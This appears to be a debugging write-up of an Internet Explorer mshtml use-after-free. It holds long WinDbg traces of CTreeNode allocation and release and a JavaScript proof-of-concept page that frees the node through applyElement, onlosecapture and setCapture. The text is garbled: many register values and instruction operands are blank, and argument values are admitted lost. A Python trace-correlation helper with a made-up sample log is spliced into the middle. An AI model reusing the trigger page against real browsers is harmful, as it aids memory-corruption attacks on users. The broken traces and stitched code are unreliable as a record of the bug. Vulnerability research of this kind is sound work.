eip=6a2bced8 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8:
6a2bced8 c0e004 shl al,
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcedb esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xb:
6a2bcedb xor al,byte ptr [ecx+] ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcede esp=0425e590 ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xe:
6a2bcede push esi
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcedf esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0xf:
6a2bcedf 8b7140 mov esi,dword ptr [ecx+40h] ds::196e2ff0=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee2 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x12:
6a2bcee2 and al,10h
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee4 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x14:
6a2bcee4 xor byte ptr [ecx+],al ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcee7 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x17:
6a2bcee7 8a5109 mov dl,byte ptr [ecx+] ds::196e2fb9=
:>
eax=196e2f00 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceea esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1a:
6a2bceea b8ffffffff mov eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceef esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x1f:
6a2bceef 6689410a mov word ptr [ecx+0Ah],ax ds::196e2fba=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef3 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x23:
6a2bcef3 0bc0 or eax,eax
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef5 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x25:
6a2bcef5 83e607 and esi,
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcef8 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x28:
6a2bcef8 83ce08 or esi,
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcefb esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2b:
6a2bcefb 6689410c mov word ptr [ecx+0Ch],ax ds::196e2fbc=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bceff esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x2f:
6a2bceff 83c8ff or eax,0FFFFFFFFh
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf02 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x32:
6a2bcf02 mov dword ptr [ecx+40h],esi ds::196e2ff0=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf05 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x35:
6a2bcf05 6689410e mov word ptr [ecx+0Eh],ax ds::196e2fbe=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf09 esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x39:
6a2bcf09 mov dword ptr [ecx],edi ds::196e2fb0=
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0b esp=0425e58c ebp=0425e590 iopl= nv up ei ng nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3b:
6a2bcf0b 85ff test edi,edi
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3d:
6a2bcf0d je mshtml!CTreeNode::CTreeNode+0x45 (6a2bcf15) [br=]
:>
eax=ffffffff ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf0f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x3f:
6a2bcf0f 8a4718 mov al,byte ptr [edi+18h] ds::07824fe0=
:>
eax=ffffff75 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf12 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x42:
6a2bcf12 mov byte ptr [ecx+],al ds::196e2fb8=
:>
eax=ffffff75 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf15 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x45:
6a2bcf15 8b4508 mov eax,dword ptr [ebp+] ss::0425e598=15171fb0
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf18 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x48:
6a2bcf18 mov dword ptr [ecx+],eax ds::196e2fb4=
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf1b esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4b:
6a2bcf1b 85ff test edi,edi
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf1d esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4d:
6a2bcf1d 0f84f15deaff je mshtml!CTreeNode::CTreeNode+0x5a (6a162d14) [br=]
:>
eax=15171fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf23 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x4f:
6a2bcf23 0fb64108 movzx eax,byte ptr [ecx+] ds::196e2fb8=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf27 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x53:
6a2bcf27 e8cd020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf2c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0 test eax,eax
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0 setne al
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003 shl al,
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2 xor al,dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 and al,
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2 xor al,dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a mov byte ptr [ecx+],al ds::196e2fb9=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff test edi,edi
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=]
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+] ds::196e2fb8=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2 xor edx,edx
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0 test eax,eax
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2 setne dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1 mov eax,ecx
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6 xor edx,esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201 and edx,
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6 xor edx,esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e mov dword ptr [ecx+40h],edx ds::196e2ff0=
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d pop ebp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800 ret
:> dd eax
196e2fb0 07824fc8 15171fb0 ffff0075 ffffffff
196e2fc0
196e2fd0
196e2fe0
196e2ff0 d0d0d0d0
196e3000 ???????? ???????? ???????? ????????
196e3010 ???????? ???????? ???????? ????????
196e3020 ???????? ???????? ???????? ????????
:> dd 07824fc8
07824fc8 6a11c2e8 1506efe8
07824fd8 071faeb0
07824fe8 18b1cfe8 0e030ff4
07824ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>

By the same reasoning, document.body.appendChild(id_1); is what causes the CTreeNode for the CGenericElement object to be constructed.

<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
// Math.* calls are auxiliary debugging markers: a breakpoint on jscript!tan/cos/sin
// shows which JS statement the native CTreeNode events belong to. Their argument
// values were lost in extraction; the numbers below are placeholders (any number works).
Math.tan(0, 0);
id_1.applyElement(id_0);
Math.cos(3, 4);
id_0.onlosecapture=function(e) {
document.write("");
}
Math.sin(0, 0);
id_0['outerText']="";
Math.tan(0, 0);
id_0.setCapture();
Math.cos(3, 4);
id_1.setCapture();
Math.sin(0, 0);
}
window.onload = function() {
trigger();
}
</script>
</html>

The POC is modified with the auxiliary debugging statements, and the debugger breaks on the first of them:

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d8c0 esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!tan:
6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds::6c751080={msvcrt!tan (773dde34)}

Set the breakpoints again:

:> bl
e 6c77d8c0 () :**** jscript!tan
e 6a2bced0 () :**** mshtml!CTreeNode::CTreeNode
e 6a2fe563 () :**** mshtml!CTreeNode::Release
e 6a23480f () :**** mshtml!CElement::CElement
e 6a31071b () :**** mshtml!CElement::~CElement
e 6a45673b () :**** mshtml!CElement::applyElement
:> g
Breakpoint hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi

As expected, it breaks here: mshtml!CElement::applyElement is the native function behind the JS applyElement call.

:> g
Breakpoint hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi
:> dd esp
0441e7ec 6a462da7 06e4efc8 07394fd8 052d5ff4
0441e7fc 0441e878 00810fd0 6a462cbe 6a2b2820
0441e80c 052d5ff4 07394fd8
0441e81c 0441e894 6a32235c 06e4efc8
0441e82c 00810fd0 06eaafd8 0000016c 6a2b2820
0441e83c 05498fe8 0441e870 00810fd0
0441e84c
0441e85c 0441ea68 0000016c 06eaafd8
:> dd 06e4efc8
06e4efc8 6a11c2e8 0738cfe8
06e4efd8 062c5ef0 07337fb0
06e4efe8 075c2f30 06e96ff4
06e4eff8 ???????? ????????
06e4f008 ???????? ???????? ???????? ????????
06e4f018 ???????? ???????? ???????? ????????
06e4f028 ???????? ???????? ???????? ????????
06e4f038 ???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
:> dd 07394fd8
07394fd8 6a627f68 6a2d2fa8 06e42fd8
07394fe8 6a2aaadc
07394ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> ln 6a627f68
(6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap
Exact matches:
mshtml!s_apfnTrackerTearoffVtable = <no type information>

The first argument is a pointer to a CGenericElement object, and we already know from above that id_1 is the CGenericElement.

:> r
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi
:> g
Breakpoint hit
eax= ebx=075c2f30 ecx=063f0754 edx=07392fb0 esi=07392fb0 edi=
eip=6a2fe563 esp=0441e684 ebp=0441e738 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::07392ff0=
:> dd edx
07392fb0 06e42fd8 ffff0060 ffffffff
07392fc0
07392fd0
07392fe0
07392ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0
06e42fe8 062c5f20 07392fb0
06e42ff8 075c2f30 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

Note that Math.cos(3,4); has not been hit yet, so it is id_1.applyElement(id_0); that causes the CTreeNode of the CPhraseElement (id_0) to be released.

:>
eax=06ab8fb0 ebx= ecx=06ab8fb0 edx= esi= edi=06e42fd8
eip=6a2bcf61 esp=0441e664 ebp=0441e668 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:> dd eax
06ab8fb0 06e42fd8 077a2fb0 ffff0060 ffffffff
06ab8fc0
06ab8fd0
06ab8fe0
06ab8ff0 d0d0d0d0
06ab9000 ???????? ???????? ???????? ????????
06ab9010 ???????? ???????? ???????? ????????
06ab9020 ???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0
06e42fe8 062c5f20
06e42ff8 06ebefe8 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

Immediately afterwards a new CTreeNode is allocated for the same element (the first dword of the new node, 06e42fd8, is the CPhraseElement pointer).

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d67f esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!cos:
6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds::6c751090={msvcrt!cos (773d8ace)}

It breaks on the auxiliary statement:

:> g
Breakpoint hit
eax=06eaafd8 ebx=06e42fd8 ecx=063f06ec edx=06ab8fb0 esi=06ab8fb0 edi=06eaafd8
eip=6a2fe563 esp=0441e440 ebp=0441e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::06ab8ff0=
:> dd edx
06ab8fb0 06e42fd8 077a2fb0
06ab8fc0 07337fd8 07382fe0
06ab8fd0 07382fe0 07337fc0
06ab8fe0 07390fe0 07337fd8 07337fd8 07390fe0
06ab8ff0 d0d0d0d0
06ab9000 ???????? ???????? ???????? ????????
06ab9010 ???????? ???????? ???????? ????????
06ab9020 ???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0 06aaafe8
06e42fe8 062c5f21 06ab8fb0
06e42ff8 075c2f30 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

So the CTreeNode of the CPhraseElement is released again. This release is caused by

id_0.onlosecapture=function(e) {
document.write("");
}

being assigned.
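The trace above is read by eye: each jscript!tan/cos/sin breakpoint marks a JS statement, and the CTreeNode::Release and CTreeNode::CTreeNode hits between two markers are attributed to the statement in between. The helper below automates that bookkeeping over a WinDbg log. It is an added example, not code from the post: it assumes the log shapes shown on this page (a `dd edx` after a Release hit and a `dd eax` at the constructor epilogue, with the element pointer in the node's first dword, as the `mov dword ptr [ecx],edi` in the constructor trace shows), a constructed sample trace, and a CTreeNode size of 0x50 bytes, which is an assumption.

```python
"""Correlate a WinDbg trace of CTreeNode construction/release with the
JavaScript marker calls (Math.tan/cos/sin) and locate which marked statement
freed the node that a later access violation touches.  Added example, not
code from the original post."""
import re
from collections import namedtuple

Event = namedtuple("Event", "marker kind node element")

MARKER_RE = re.compile(r"^jscript!(\w+):")                      # e.g. "jscript!cos:"
RELEASE_RE = re.compile(r"^mshtml!CTreeNode::Release:")
CTOR_RE = re.compile(r"^mshtml!CTreeNode::CTreeNode\+0x91:")    # ctor epilogue, eax = new node
DD_RE = re.compile(r"^([0-9a-f]{8})\s+([0-9a-f]{8})\b")         # first line of a dd dump
FAULT_RE = re.compile(r"ds:[0-9a-f]*:([0-9a-f]{8})=\?{8}")      # read of unmapped memory
NODE_SIZE = 0x50   # assumed: the ctor writes offset 0x40, so the object is >= 0x44 bytes


def parse_trace(text):
    """Return (events, crash_addr). An event is recorded from the first dd line
    that follows a Release or constructor-epilogue breakpoint hit."""
    events, marker, pending, crash = [], None, None, None
    for line in text.splitlines():
        line = line.strip()
        m = MARKER_RE.match(line)
        if m:
            marker = m.group(1)          # statement that is currently executing
            continue
        if RELEASE_RE.match(line):
            pending = "release"
            continue
        if CTOR_RE.match(line):
            pending = "alloc"
            continue
        m = DD_RE.match(line)
        if m and pending:
            node, element = int(m.group(1), 16), int(m.group(2), 16)
            events.append(Event(marker, pending, node, element))
            pending = None
            continue
        m = FAULT_RE.search(line)
        if m and not pending:
            crash = int(m.group(1), 16)
    return events, crash


def analyze(events, crash=None):
    """Track freed nodes per marker; flag double releases and a crash address
    that falls inside a node released and never re-allocated."""
    freed, element_nodes, findings = {}, {}, []
    for ev in events:
        if ev.kind == "alloc":
            freed.pop(ev.node, None)            # address is live again
            element_nodes.setdefault(ev.element, []).append(ev.node)
        else:
            if ev.node in freed:
                findings.append(f"node {ev.node:08x} released twice (after marker {ev.marker})")
            freed[ev.node] = ev.marker
    if crash is not None:
        for node, marker in freed.items():
            if node <= crash < node + NODE_SIZE:
                findings.append(f"crash reads {crash:08x} inside CTreeNode {node:08x} "
                                f"freed after marker {marker}")
    return {"element_nodes": element_nodes, "freed": freed, "findings": findings}


# Constructed sample trace, shaped like the WinDbg output on this page.
SAMPLE_TRACE = """
Breakpoint hit
jscript!tan:
Breakpoint hit
mshtml!CElement::applyElement:
Breakpoint hit
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds:0023:07392ff0=00000000
0:005> dd edx
07392fb0 06e42fd8 00000000 ffff0060 ffffffff
mshtml!CTreeNode::CTreeNode+0x91:
0:005> dd eax
06ab8fb0 06e42fd8 077a2fb0 ffff0060 ffffffff
Breakpoint hit
jscript!cos:
Breakpoint hit
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds:0023:06ab8ff0=00000000
0:005> dd edx
06ab8fb0 06e42fd8 077a2fb0 00000000 00000000
Breakpoint hit
jscript!sin:
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f mov ecx,dword ptr [edi] ds:0023:06ab8fb0=????????
"""

if __name__ == "__main__":
    evs, crash = parse_trace(SAMPLE_TRACE)
    for ev in evs:
        print(f"{ev.marker!s:>5} {ev.kind:7} node={ev.node:08x} element={ev.element:08x}")
    for f in analyze(evs, crash)["findings"]:
        print("FINDING:", f)
```

Run against a real log, the script prints each node event under the marker that preceded it, which is exactly the correlation done by hand above (release under tan, re-allocation for the same element, second release under cos), and then names the marker after which the node touched by the faulting read was freed.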

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d711 esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!sin:
6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds::6c751068={msvcrt!sin (773d8aea)}
:> g
Breakpoint hit
eax=0736cfa8 ebx= ecx= edx=07337fb0 esi=07337fb0 edi=06e4efc8
eip=6a2fe563 esp=0441e48c ebp=0441e5e0 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
